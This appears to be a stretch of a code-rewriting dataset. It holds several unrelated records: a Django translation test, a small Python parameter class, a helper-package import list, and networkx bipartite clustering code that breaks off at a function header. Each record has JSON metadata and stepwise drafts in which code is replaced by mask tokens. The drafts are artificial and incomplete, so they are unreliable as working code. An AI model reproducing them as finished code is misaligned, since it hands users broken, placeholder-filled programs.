class CompetenceTest(TestCase):
    """Exercise translated names on the Competence model."""

    def setUp(self):
        """Create one competence with an English and a Swedish name."""
        self.competence = Competence.objects.create(name='mining')
        self.competence.set_current_language('sv')
        self.competence.name = 'gruvarbete'
        self.competence.save()

    def test_translation(self):
        """Switching language returns the stored Swedish translation."""
        fetched = Competence.objects.first()
        self.assertEqual(fetched.name, 'mining')
        fetched.set_current_language('sv')
        self.assertEqual(fetched.name, 'gruvarbete')

    def test_translation_fallback(self):
        """A language with no translation falls back to the default name."""
        fetched = Competence.objects.first()
        fetched.set_current_language('fi')
        self.assertEqual(fetched.name, 'mining')
|
flexible
|
{
"blob_id": "d7b0ff6549d854d21ad1d2d0f5a9e7f75f4ac1d5",
"index": 956,
"step-1": "<mask token>\n\n\nclass CompetenceTest(TestCase):\n <mask token>\n\n def test_translation(self):\n competence = Competence.objects.first()\n self.assertEqual(competence.name, 'mining')\n competence.set_current_language('sv')\n self.assertEqual(competence.name, 'gruvarbete')\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass CompetenceTest(TestCase):\n <mask token>\n\n def test_translation(self):\n competence = Competence.objects.first()\n self.assertEqual(competence.name, 'mining')\n competence.set_current_language('sv')\n self.assertEqual(competence.name, 'gruvarbete')\n\n def test_translation_fallback(self):\n competence = Competence.objects.first()\n competence.set_current_language('fi')\n self.assertEqual(competence.name, 'mining')\n",
"step-3": "<mask token>\n\n\nclass CompetenceTest(TestCase):\n\n def setUp(self):\n self.competence = Competence.objects.create(name='mining')\n self.competence.set_current_language('sv')\n self.competence.name = 'gruvarbete'\n self.competence.save()\n\n def test_translation(self):\n competence = Competence.objects.first()\n self.assertEqual(competence.name, 'mining')\n competence.set_current_language('sv')\n self.assertEqual(competence.name, 'gruvarbete')\n\n def test_translation_fallback(self):\n competence = Competence.objects.first()\n competence.set_current_language('fi')\n self.assertEqual(competence.name, 'mining')\n",
"step-4": "from django.test import TestCase\nfrom recruitmentapp.apps.core.models import Competence\n\n\nclass CompetenceTest(TestCase):\n\n def setUp(self):\n self.competence = Competence.objects.create(name='mining')\n self.competence.set_current_language('sv')\n self.competence.name = 'gruvarbete'\n self.competence.save()\n\n def test_translation(self):\n competence = Competence.objects.first()\n self.assertEqual(competence.name, 'mining')\n competence.set_current_language('sv')\n self.assertEqual(competence.name, 'gruvarbete')\n\n def test_translation_fallback(self):\n competence = Competence.objects.first()\n competence.set_current_language('fi')\n self.assertEqual(competence.name, 'mining')\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
class tenDParameters:
    """Simple record bundling ten observed parameters.

    Field names suggest galactic latitude ``b``, distance modulus ``DM``,
    proper motions ``pm_l``/``pm_b``, radial velocity ``vrad``, the
    ``s``-prefixed fields as their uncertainties, and ``vc`` — presumably
    a circular velocity; confirm against the code constructing instances.
    """

    def __init__(self,
                 b: float,
                 DM: float,
                 pm_l: float,
                 pm_b: float,
                 vrad: float,
                 sb: float,
                 spml: float,
                 spmb: float,
                 sdm: float,
                 vc: float):
        # NOTE: per the original author, pm_l arrives already multiplied
        # by cos(b).
        fields = (('b', b), ('DM', DM), ('pm_l', pm_l), ('pm_b', pm_b),
                  ('vrad', vrad), ('sb', sb), ('spml', spml),
                  ('spmb', spmb), ('sdm', sdm), ('vc', vc))
        for attr, value in fields:
            setattr(self, attr, value)
|
normal
|
{
"blob_id": "82e7e22293551e061dcb295c52714c22df0ed0ce",
"index": 5678,
"step-1": "<mask token>\n",
"step-2": "class tenDParameters:\n <mask token>\n",
"step-3": "class tenDParameters:\n\n def __init__(self, b: float, DM: float, pm_l: float, pm_b: float, vrad:\n float, sb: float, spml: float, spmb: float, sdm: float, vc: float):\n self.b = b\n self.DM = DM\n self.pm_l = pm_l\n self.pm_b = pm_b\n self.vrad = vrad\n self.sb = sb\n self.spml = spml\n self.spmb = spmb\n self.sdm = sdm\n self.vc = vc\n",
"step-4": "class tenDParameters:\n def __init__(self,\n b: float,\n DM: float,\n pm_l: float,\n pm_b: float,\n vrad: float,\n sb: float,\n spml: float,\n spmb: float,\n sdm: float,\n vc: float):\n self.b = b\n self.DM = DM\n # this is actually pm_l * cos b, apparently\n self.pm_l = pm_l\n self.pm_b = pm_b\n self.vrad = vrad\n self.sb = sb\n self.spml = spml\n self.spmb = spmb\n self.sdm = sdm\n self.vc = vc",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from .string_helper import camelize, uncamelize, camelize_for_dict_key, camelize_for_dict_key_in_list, uncamelize_for_dict_key, uncamelize_for_dict_key_in_list
from .datetime_helper import datetime_format
from .class_helper import override
from .paginate import paginate2dict
from .json_type import JsonType
from .request import RequestDict
from .response import ResponseJson
from .api_helper import gen_links, gen_pagination, sort_list
from .api_helper import eliminate_key, remain_key
<|reserved_special_token_1|>
# coding=utf-8
# flake8:noqa
from .string_helper import (
camelize, uncamelize,
camelize_for_dict_key, camelize_for_dict_key_in_list,
uncamelize_for_dict_key, uncamelize_for_dict_key_in_list
)
from .datetime_helper import datetime_format
from .class_helper import override
from .paginate import paginate2dict
from .json_type import JsonType
from .request import RequestDict
from .response import ResponseJson
from .api_helper import gen_links, gen_pagination, sort_list
from .api_helper import eliminate_key, remain_key
|
flexible
|
{
"blob_id": "64a590d31be98f7639034662b2a322e5572cc1ae",
"index": 3554,
"step-1": "<mask token>\n",
"step-2": "from .string_helper import camelize, uncamelize, camelize_for_dict_key, camelize_for_dict_key_in_list, uncamelize_for_dict_key, uncamelize_for_dict_key_in_list\nfrom .datetime_helper import datetime_format\nfrom .class_helper import override\nfrom .paginate import paginate2dict\nfrom .json_type import JsonType\nfrom .request import RequestDict\nfrom .response import ResponseJson\nfrom .api_helper import gen_links, gen_pagination, sort_list\nfrom .api_helper import eliminate_key, remain_key\n",
"step-3": "# coding=utf-8\n# flake8:noqa\n\nfrom .string_helper import (\n camelize, uncamelize,\n camelize_for_dict_key, camelize_for_dict_key_in_list,\n uncamelize_for_dict_key, uncamelize_for_dict_key_in_list\n)\nfrom .datetime_helper import datetime_format\nfrom .class_helper import override\n\nfrom .paginate import paginate2dict\nfrom .json_type import JsonType\nfrom .request import RequestDict\nfrom .response import ResponseJson\nfrom .api_helper import gen_links, gen_pagination, sort_list\nfrom .api_helper import eliminate_key, remain_key\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def cc_dot(nu, nv):
return float(len(nu & nv)) / len(nu | nv)
def cc_max(nu, nv):
return float(len(nu & nv)) / max(len(nu), len(nv))
<|reserved_special_token_0|>
def average_clustering(G, nodes=None, mode='dot'):
"""Compute the average bipartite clustering coefficient.
A clustering coefficient for the whole graph is the average,
.. math::
C = \\frac{1}{n}\\sum_{v \\in G} c_v,
where `n` is the number of nodes in `G`.
Similar measures for the two bipartite sets can be defined [1]_
.. math::
C_X = \\frac{1}{|X|}\\sum_{v \\in X} c_v,
where `X` is a bipartite set of `G`.
Parameters
----------
G : graph
a bipartite graph
nodes : list or iterable, optional
A container of nodes to use in computing the average.
The nodes should be either the entire graph (the default) or one of the
bipartite sets.
mode : string
The pariwise bipartite clustering method.
It must be "dot", "max", or "min"
Returns
-------
clustering : float
The average bipartite clustering for the given set of nodes or the
entire graph if no nodes are specified.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G=nx.star_graph(3) # star graphs are bipartite
>>> bipartite.average_clustering(G)
0.75
>>> X,Y=bipartite.sets(G)
>>> bipartite.average_clustering(G,X)
0.0
>>> bipartite.average_clustering(G,Y)
1.0
See Also
--------
clustering
Notes
-----
The container of nodes passed to this function must contain all of the nodes
in one of the bipartite sets ("top" or "bottom") in order to compute
the correct average bipartite clustering coefficients.
See :mod:`bipartite documentation <networkx.algorithms.bipartite>`
for further details on how bipartite graphs are handled in NetworkX.
References
----------
.. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
Basic notions for the analysis of large two-mode networks.
Social Networks 30(1), 31--48.
"""
if nodes is None:
nodes = G
ccs = latapy_clustering(G, nodes=nodes, mode=mode)
return float(sum(ccs[v] for v in nodes)) / len(nodes)
def robins_alexander_clustering(G):
"""Compute the bipartite clustering of G.
Robins and Alexander [1]_ defined bipartite clustering coefficient as
four times the number of four cycles `C_4` divided by the number of
three paths `L_3` in a bipartite graph:
.. math::
CC_4 = \\frac{4 * C_4}{L_3}
Parameters
----------
G : graph
a bipartite graph
Returns
-------
clustering : float
The Robins and Alexander bipartite clustering for the input graph.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G = nx.davis_southern_women_graph()
>>> print(round(bipartite.robins_alexander_clustering(G), 3))
0.468
See Also
--------
latapy_clustering
square_clustering
References
----------
.. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking
directors: Network structure and distance in bipartite graphs.
Computational & Mathematical Organization Theory 10(1), 69–94.
"""
if G.order() < 4 or G.size() < 3:
return 0
L_3 = _threepaths(G)
if L_3 == 0:
return 0
C_4 = _four_cycles(G)
return 4.0 * C_4 / L_3
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def cc_dot(nu, nv):
return float(len(nu & nv)) / len(nu | nv)
def cc_max(nu, nv):
return float(len(nu & nv)) / max(len(nu), len(nv))
def cc_min(nu, nv):
return float(len(nu & nv)) / min(len(nu), len(nv))
<|reserved_special_token_0|>
def latapy_clustering(G, nodes=None, mode='dot'):
"""Compute a bipartite clustering coefficient for nodes.
The bipartie clustering coefficient is a measure of local density
of connections defined as [1]_:
.. math::
c_u = \\frac{\\sum_{v \\in N(N(u))} c_{uv} }{|N(N(u))|}
where `N(N(u))` are the second order neighbors of `u` in `G` excluding `u`,
and `c_{uv}` is the pairwise clustering coefficient between nodes
`u` and `v`.
The mode selects the function for `c_{uv}` which can be:
`dot`:
.. math::
c_{uv}=\\frac{|N(u)\\cap N(v)|}{|N(u) \\cup N(v)|}
`min`:
.. math::
c_{uv}=\\frac{|N(u)\\cap N(v)|}{min(|N(u)|,|N(v)|)}
`max`:
.. math::
c_{uv}=\\frac{|N(u)\\cap N(v)|}{max(|N(u)|,|N(v)|)}
Parameters
----------
G : graph
A bipartite graph
nodes : list or iterable (optional)
Compute bipartite clustering for these nodes. The default
is all nodes in G.
mode : string
The pariwise bipartite clustering method to be used in the computation.
It must be "dot", "max", or "min".
Returns
-------
clustering : dictionary
A dictionary keyed by node with the clustering coefficient value.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G = nx.path_graph(4) # path graphs are bipartite
>>> c = bipartite.clustering(G)
>>> c[0]
0.5
>>> c = bipartite.clustering(G,mode='min')
>>> c[0]
1.0
See Also
--------
robins_alexander_clustering
square_clustering
average_clustering
References
----------
.. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
Basic notions for the analysis of large two-mode networks.
Social Networks 30(1), 31--48.
"""
if not nx.algorithms.bipartite.is_bipartite(G):
raise nx.NetworkXError('Graph is not bipartite')
try:
cc_func = modes[mode]
except KeyError:
raise nx.NetworkXError(
'Mode for bipartite clustering must be: dot, min or max')
if nodes is None:
nodes = G
ccs = {}
for v in nodes:
cc = 0.0
nbrs2 = set([u for nbr in G[v] for u in G[nbr]]) - set([v])
for u in nbrs2:
cc += cc_func(set(G[u]), set(G[v]))
if cc > 0.0:
cc /= len(nbrs2)
ccs[v] = cc
return ccs
<|reserved_special_token_0|>
def average_clustering(G, nodes=None, mode='dot'):
"""Compute the average bipartite clustering coefficient.
A clustering coefficient for the whole graph is the average,
.. math::
C = \\frac{1}{n}\\sum_{v \\in G} c_v,
where `n` is the number of nodes in `G`.
Similar measures for the two bipartite sets can be defined [1]_
.. math::
C_X = \\frac{1}{|X|}\\sum_{v \\in X} c_v,
where `X` is a bipartite set of `G`.
Parameters
----------
G : graph
a bipartite graph
nodes : list or iterable, optional
A container of nodes to use in computing the average.
The nodes should be either the entire graph (the default) or one of the
bipartite sets.
mode : string
The pariwise bipartite clustering method.
It must be "dot", "max", or "min"
Returns
-------
clustering : float
The average bipartite clustering for the given set of nodes or the
entire graph if no nodes are specified.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G=nx.star_graph(3) # star graphs are bipartite
>>> bipartite.average_clustering(G)
0.75
>>> X,Y=bipartite.sets(G)
>>> bipartite.average_clustering(G,X)
0.0
>>> bipartite.average_clustering(G,Y)
1.0
See Also
--------
clustering
Notes
-----
The container of nodes passed to this function must contain all of the nodes
in one of the bipartite sets ("top" or "bottom") in order to compute
the correct average bipartite clustering coefficients.
See :mod:`bipartite documentation <networkx.algorithms.bipartite>`
for further details on how bipartite graphs are handled in NetworkX.
References
----------
.. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
Basic notions for the analysis of large two-mode networks.
Social Networks 30(1), 31--48.
"""
if nodes is None:
nodes = G
ccs = latapy_clustering(G, nodes=nodes, mode=mode)
return float(sum(ccs[v] for v in nodes)) / len(nodes)
def robins_alexander_clustering(G):
"""Compute the bipartite clustering of G.
Robins and Alexander [1]_ defined bipartite clustering coefficient as
four times the number of four cycles `C_4` divided by the number of
three paths `L_3` in a bipartite graph:
.. math::
CC_4 = \\frac{4 * C_4}{L_3}
Parameters
----------
G : graph
a bipartite graph
Returns
-------
clustering : float
The Robins and Alexander bipartite clustering for the input graph.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G = nx.davis_southern_women_graph()
>>> print(round(bipartite.robins_alexander_clustering(G), 3))
0.468
See Also
--------
latapy_clustering
square_clustering
References
----------
.. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking
directors: Network structure and distance in bipartite graphs.
Computational & Mathematical Organization Theory 10(1), 69–94.
"""
if G.order() < 4 or G.size() < 3:
return 0
L_3 = _threepaths(G)
if L_3 == 0:
return 0
C_4 = _four_cycles(G)
return 4.0 * C_4 / L_3
def _four_cycles(G):
cycles = 0
for v in G:
for u, w in itertools.combinations(G[v], 2):
cycles += len((set(G[u]) & set(G[w])) - set([v]))
return cycles / 4
def _threepaths(G):
paths = 0
for v in G:
for u in G[v]:
for w in (set(G[u]) - set([v])):
paths += len(set(G[w]) - set([v, u]))
return paths / 2
<|reserved_special_token_1|>
<|reserved_special_token_0|>
__author__ = '\n'.join(['Jordi Torrents <jtorrents@milnou.net>',
'Aric Hagberg (hagberg@lanl.gov)'])
__all__ = ['clustering', 'average_clustering', 'latapy_clustering',
'robins_alexander_clustering']
def cc_dot(nu, nv):
return float(len(nu & nv)) / len(nu | nv)
def cc_max(nu, nv):
return float(len(nu & nv)) / max(len(nu), len(nv))
def cc_min(nu, nv):
return float(len(nu & nv)) / min(len(nu), len(nv))
modes = {'dot': cc_dot, 'min': cc_min, 'max': cc_max}
def latapy_clustering(G, nodes=None, mode='dot'):
"""Compute a bipartite clustering coefficient for nodes.
The bipartie clustering coefficient is a measure of local density
of connections defined as [1]_:
.. math::
c_u = \\frac{\\sum_{v \\in N(N(u))} c_{uv} }{|N(N(u))|}
where `N(N(u))` are the second order neighbors of `u` in `G` excluding `u`,
and `c_{uv}` is the pairwise clustering coefficient between nodes
`u` and `v`.
The mode selects the function for `c_{uv}` which can be:
`dot`:
.. math::
c_{uv}=\\frac{|N(u)\\cap N(v)|}{|N(u) \\cup N(v)|}
`min`:
.. math::
c_{uv}=\\frac{|N(u)\\cap N(v)|}{min(|N(u)|,|N(v)|)}
`max`:
.. math::
c_{uv}=\\frac{|N(u)\\cap N(v)|}{max(|N(u)|,|N(v)|)}
Parameters
----------
G : graph
A bipartite graph
nodes : list or iterable (optional)
Compute bipartite clustering for these nodes. The default
is all nodes in G.
mode : string
The pariwise bipartite clustering method to be used in the computation.
It must be "dot", "max", or "min".
Returns
-------
clustering : dictionary
A dictionary keyed by node with the clustering coefficient value.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G = nx.path_graph(4) # path graphs are bipartite
>>> c = bipartite.clustering(G)
>>> c[0]
0.5
>>> c = bipartite.clustering(G,mode='min')
>>> c[0]
1.0
See Also
--------
robins_alexander_clustering
square_clustering
average_clustering
References
----------
.. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
Basic notions for the analysis of large two-mode networks.
Social Networks 30(1), 31--48.
"""
if not nx.algorithms.bipartite.is_bipartite(G):
raise nx.NetworkXError('Graph is not bipartite')
try:
cc_func = modes[mode]
except KeyError:
raise nx.NetworkXError(
'Mode for bipartite clustering must be: dot, min or max')
if nodes is None:
nodes = G
ccs = {}
for v in nodes:
cc = 0.0
nbrs2 = set([u for nbr in G[v] for u in G[nbr]]) - set([v])
for u in nbrs2:
cc += cc_func(set(G[u]), set(G[v]))
if cc > 0.0:
cc /= len(nbrs2)
ccs[v] = cc
return ccs
clustering = latapy_clustering
def average_clustering(G, nodes=None, mode='dot'):
"""Compute the average bipartite clustering coefficient.
A clustering coefficient for the whole graph is the average,
.. math::
C = \\frac{1}{n}\\sum_{v \\in G} c_v,
where `n` is the number of nodes in `G`.
Similar measures for the two bipartite sets can be defined [1]_
.. math::
C_X = \\frac{1}{|X|}\\sum_{v \\in X} c_v,
where `X` is a bipartite set of `G`.
Parameters
----------
G : graph
a bipartite graph
nodes : list or iterable, optional
A container of nodes to use in computing the average.
The nodes should be either the entire graph (the default) or one of the
bipartite sets.
mode : string
The pariwise bipartite clustering method.
It must be "dot", "max", or "min"
Returns
-------
clustering : float
The average bipartite clustering for the given set of nodes or the
entire graph if no nodes are specified.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G=nx.star_graph(3) # star graphs are bipartite
>>> bipartite.average_clustering(G)
0.75
>>> X,Y=bipartite.sets(G)
>>> bipartite.average_clustering(G,X)
0.0
>>> bipartite.average_clustering(G,Y)
1.0
See Also
--------
clustering
Notes
-----
The container of nodes passed to this function must contain all of the nodes
in one of the bipartite sets ("top" or "bottom") in order to compute
the correct average bipartite clustering coefficients.
See :mod:`bipartite documentation <networkx.algorithms.bipartite>`
for further details on how bipartite graphs are handled in NetworkX.
References
----------
.. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
Basic notions for the analysis of large two-mode networks.
Social Networks 30(1), 31--48.
"""
if nodes is None:
nodes = G
ccs = latapy_clustering(G, nodes=nodes, mode=mode)
return float(sum(ccs[v] for v in nodes)) / len(nodes)
def robins_alexander_clustering(G):
"""Compute the bipartite clustering of G.
Robins and Alexander [1]_ defined bipartite clustering coefficient as
four times the number of four cycles `C_4` divided by the number of
three paths `L_3` in a bipartite graph:
.. math::
CC_4 = \\frac{4 * C_4}{L_3}
Parameters
----------
G : graph
a bipartite graph
Returns
-------
clustering : float
The Robins and Alexander bipartite clustering for the input graph.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G = nx.davis_southern_women_graph()
>>> print(round(bipartite.robins_alexander_clustering(G), 3))
0.468
See Also
--------
latapy_clustering
square_clustering
References
----------
.. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking
directors: Network structure and distance in bipartite graphs.
Computational & Mathematical Organization Theory 10(1), 69–94.
"""
if G.order() < 4 or G.size() < 3:
return 0
L_3 = _threepaths(G)
if L_3 == 0:
return 0
C_4 = _four_cycles(G)
return 4.0 * C_4 / L_3
def _four_cycles(G):
cycles = 0
for v in G:
for u, w in itertools.combinations(G[v], 2):
cycles += len((set(G[u]) & set(G[w])) - set([v]))
return cycles / 4
def _threepaths(G):
paths = 0
for v in G:
for u in G[v]:
for w in (set(G[u]) - set([v])):
paths += len(set(G[w]) - set([v, u]))
return paths / 2
<|reserved_special_token_1|>
import itertools
import networkx as nx
__author__ = '\n'.join(['Jordi Torrents <jtorrents@milnou.net>',
'Aric Hagberg (hagberg@lanl.gov)'])
__all__ = ['clustering', 'average_clustering', 'latapy_clustering',
'robins_alexander_clustering']
def cc_dot(nu, nv):
return float(len(nu & nv)) / len(nu | nv)
def cc_max(nu, nv):
return float(len(nu & nv)) / max(len(nu), len(nv))
def cc_min(nu, nv):
return float(len(nu & nv)) / min(len(nu), len(nv))
modes = {'dot': cc_dot, 'min': cc_min, 'max': cc_max}
def latapy_clustering(G, nodes=None, mode='dot'):
"""Compute a bipartite clustering coefficient for nodes.
The bipartie clustering coefficient is a measure of local density
of connections defined as [1]_:
.. math::
c_u = \\frac{\\sum_{v \\in N(N(u))} c_{uv} }{|N(N(u))|}
where `N(N(u))` are the second order neighbors of `u` in `G` excluding `u`,
and `c_{uv}` is the pairwise clustering coefficient between nodes
`u` and `v`.
The mode selects the function for `c_{uv}` which can be:
`dot`:
.. math::
c_{uv}=\\frac{|N(u)\\cap N(v)|}{|N(u) \\cup N(v)|}
`min`:
.. math::
c_{uv}=\\frac{|N(u)\\cap N(v)|}{min(|N(u)|,|N(v)|)}
`max`:
.. math::
c_{uv}=\\frac{|N(u)\\cap N(v)|}{max(|N(u)|,|N(v)|)}
Parameters
----------
G : graph
A bipartite graph
nodes : list or iterable (optional)
Compute bipartite clustering for these nodes. The default
is all nodes in G.
mode : string
The pariwise bipartite clustering method to be used in the computation.
It must be "dot", "max", or "min".
Returns
-------
clustering : dictionary
A dictionary keyed by node with the clustering coefficient value.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G = nx.path_graph(4) # path graphs are bipartite
>>> c = bipartite.clustering(G)
>>> c[0]
0.5
>>> c = bipartite.clustering(G,mode='min')
>>> c[0]
1.0
See Also
--------
robins_alexander_clustering
square_clustering
average_clustering
References
----------
.. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
Basic notions for the analysis of large two-mode networks.
Social Networks 30(1), 31--48.
"""
if not nx.algorithms.bipartite.is_bipartite(G):
raise nx.NetworkXError('Graph is not bipartite')
try:
cc_func = modes[mode]
except KeyError:
raise nx.NetworkXError(
'Mode for bipartite clustering must be: dot, min or max')
if nodes is None:
nodes = G
ccs = {}
for v in nodes:
cc = 0.0
nbrs2 = set([u for nbr in G[v] for u in G[nbr]]) - set([v])
for u in nbrs2:
cc += cc_func(set(G[u]), set(G[v]))
if cc > 0.0:
cc /= len(nbrs2)
ccs[v] = cc
return ccs
clustering = latapy_clustering
def average_clustering(G, nodes=None, mode='dot'):
"""Compute the average bipartite clustering coefficient.
A clustering coefficient for the whole graph is the average,
.. math::
C = \\frac{1}{n}\\sum_{v \\in G} c_v,
where `n` is the number of nodes in `G`.
Similar measures for the two bipartite sets can be defined [1]_
.. math::
C_X = \\frac{1}{|X|}\\sum_{v \\in X} c_v,
where `X` is a bipartite set of `G`.
Parameters
----------
G : graph
a bipartite graph
nodes : list or iterable, optional
A container of nodes to use in computing the average.
The nodes should be either the entire graph (the default) or one of the
bipartite sets.
mode : string
The pariwise bipartite clustering method.
It must be "dot", "max", or "min"
Returns
-------
clustering : float
The average bipartite clustering for the given set of nodes or the
entire graph if no nodes are specified.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G=nx.star_graph(3) # star graphs are bipartite
>>> bipartite.average_clustering(G)
0.75
>>> X,Y=bipartite.sets(G)
>>> bipartite.average_clustering(G,X)
0.0
>>> bipartite.average_clustering(G,Y)
1.0
See Also
--------
clustering
Notes
-----
The container of nodes passed to this function must contain all of the nodes
in one of the bipartite sets ("top" or "bottom") in order to compute
the correct average bipartite clustering coefficients.
See :mod:`bipartite documentation <networkx.algorithms.bipartite>`
for further details on how bipartite graphs are handled in NetworkX.
References
----------
.. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
Basic notions for the analysis of large two-mode networks.
Social Networks 30(1), 31--48.
"""
if nodes is None:
nodes = G
ccs = latapy_clustering(G, nodes=nodes, mode=mode)
return float(sum(ccs[v] for v in nodes)) / len(nodes)
def robins_alexander_clustering(G):
"""Compute the bipartite clustering of G.
Robins and Alexander [1]_ defined bipartite clustering coefficient as
four times the number of four cycles `C_4` divided by the number of
three paths `L_3` in a bipartite graph:
.. math::
CC_4 = \\frac{4 * C_4}{L_3}
Parameters
----------
G : graph
a bipartite graph
Returns
-------
clustering : float
The Robins and Alexander bipartite clustering for the input graph.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G = nx.davis_southern_women_graph()
>>> print(round(bipartite.robins_alexander_clustering(G), 3))
0.468
See Also
--------
latapy_clustering
square_clustering
References
----------
.. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking
directors: Network structure and distance in bipartite graphs.
Computational & Mathematical Organization Theory 10(1), 69–94.
"""
if G.order() < 4 or G.size() < 3:
return 0
L_3 = _threepaths(G)
if L_3 == 0:
return 0
C_4 = _four_cycles(G)
return 4.0 * C_4 / L_3
def _four_cycles(G):
cycles = 0
for v in G:
for u, w in itertools.combinations(G[v], 2):
cycles += len((set(G[u]) & set(G[w])) - set([v]))
return cycles / 4
def _threepaths(G):
paths = 0
for v in G:
for u in G[v]:
for w in (set(G[u]) - set([v])):
paths += len(set(G[w]) - set([v, u]))
return paths / 2
<|reserved_special_token_1|>
#-*- coding: utf-8 -*-
# Copyright (C) 2011 by
# Jordi Torrents <jtorrents@milnou.net>
# Aric Hagberg <hagberg@lanl.gov>
# All rights reserved.
# BSD license.
import itertools
import networkx as nx
__author__ = """\n""".join(['Jordi Torrents <jtorrents@milnou.net>',
'Aric Hagberg (hagberg@lanl.gov)'])
__all__ = ['clustering',
'average_clustering',
'latapy_clustering',
'robins_alexander_clustering']
# functions for computing clustering of pairs
def cc_dot(nu, nv):
    """Pairwise coefficient: shared neighbors over the union (Jaccard)."""
    shared = nu & nv
    combined = nu | nv
    return len(shared) / float(len(combined))
def cc_max(nu, nv):
    """Pairwise coefficient normalized by the larger neighborhood."""
    larger = max(len(nu), len(nv))
    return len(nu & nv) / float(larger)
def cc_min(nu, nv):
    """Pairwise coefficient normalized by the smaller neighborhood."""
    smaller = min(len(nu), len(nv))
    return len(nu & nv) / float(smaller)
modes = {'dot': cc_dot,
'min': cc_min,
'max': cc_max}
def latapy_clustering(G, nodes=None, mode='dot'):
    r"""Compute a bipartite clustering coefficient for nodes.

    The coefficient of ``u`` averages a pairwise coefficient ``c_{uv}``
    over the second-order neighbors of ``u`` in ``G`` (excluding ``u``
    itself) [1]_:

    .. math::

       c_u = \frac{\sum_{v \in N(N(u))} c_{uv} }{|N(N(u))|}

    ``mode`` selects the pairwise normalization:

    ``dot``:  :math:`c_{uv}=\frac{|N(u)\cap N(v)|}{|N(u) \cup N(v)|}`

    ``min``:  :math:`c_{uv}=\frac{|N(u)\cap N(v)|}{min(|N(u)|,|N(v)|)}`

    ``max``:  :math:`c_{uv}=\frac{|N(u)\cap N(v)|}{max(|N(u)|,|N(v)|)}`

    Parameters
    ----------
    G : graph
        A bipartite graph
    nodes : list or iterable (optional)
        Compute bipartite clustering for these nodes. The default
        is all nodes in G.
    mode : string
        The pairwise bipartite clustering method to be used in the
        computation. It must be "dot", "max", or "min".

    Returns
    -------
    clustering : dictionary
        A dictionary keyed by node with the clustering coefficient value.

    Examples
    --------
    >>> from networkx.algorithms import bipartite
    >>> G = nx.path_graph(4) # path graphs are bipartite
    >>> c = bipartite.clustering(G)
    >>> c[0]
    0.5
    >>> c = bipartite.clustering(G,mode='min')
    >>> c[0]
    1.0

    See Also
    --------
    robins_alexander_clustering
    square_clustering
    average_clustering

    References
    ----------
    .. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
       Basic notions for the analysis of large two-mode networks.
       Social Networks 30(1), 31--48.
    """
    if not nx.algorithms.bipartite.is_bipartite(G):
        raise nx.NetworkXError("Graph is not bipartite")
    try:
        pairwise = modes[mode]
    except KeyError:
        raise nx.NetworkXError(
            "Mode for bipartite clustering must be: dot, min or max")
    targets = G if nodes is None else nodes
    coefficients = {}
    for v in targets:
        # Every node exactly two hops from v, with v itself removed.
        second_order = {u for nbr in G[v] for u in G[nbr]} - {v}
        if second_order:
            acc = sum(pairwise(set(G[u]), set(G[v])) for u in second_order)
            coefficients[v] = acc / len(second_order)
        else:
            coefficients[v] = 0.0
    return coefficients
clustering = latapy_clustering
def average_clustering(G, nodes=None, mode='dot'):
    r"""Compute the average bipartite clustering coefficient.

    The graph-level coefficient is the mean of the per-node values,

    .. math::

       C = \frac{1}{n}\sum_{v \in G} c_v,

    where `n` is the number of nodes in `G`.  Restricting ``nodes`` to one
    bipartite set `X` gives the set-level measure [1]_

    .. math::

       C_X = \frac{1}{|X|}\sum_{v \in X} c_v.

    Parameters
    ----------
    G : graph
        a bipartite graph
    nodes : list or iterable, optional
        A container of nodes to use in computing the average.
        The nodes should be either the entire graph (the default) or one
        of the bipartite sets.
    mode : string
        The pairwise bipartite clustering method.
        It must be "dot", "max", or "min".

    Returns
    -------
    clustering : float
        The average bipartite clustering for the given set of nodes or
        the entire graph if no nodes are specified.

    Examples
    --------
    >>> from networkx.algorithms import bipartite
    >>> G=nx.star_graph(3) # star graphs are bipartite
    >>> bipartite.average_clustering(G)
    0.75
    >>> X,Y=bipartite.sets(G)
    >>> bipartite.average_clustering(G,X)
    0.0
    >>> bipartite.average_clustering(G,Y)
    1.0

    See Also
    --------
    clustering

    Notes
    -----
    The container of nodes passed to this function must contain all of
    the nodes in one of the bipartite sets ("top" or "bottom") in order
    to compute the correct average bipartite clustering coefficients.
    See :mod:`bipartite documentation <networkx.algorithms.bipartite>`
    for further details on how bipartite graphs are handled in NetworkX.

    References
    ----------
    .. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
       Basic notions for the analysis of large two-mode networks.
       Social Networks 30(1), 31--48.
    """
    targets = G if nodes is None else nodes
    per_node = latapy_clustering(G, nodes=targets, mode=mode)
    return float(sum(per_node[v] for v in targets)) / len(targets)
def robins_alexander_clustering(G):
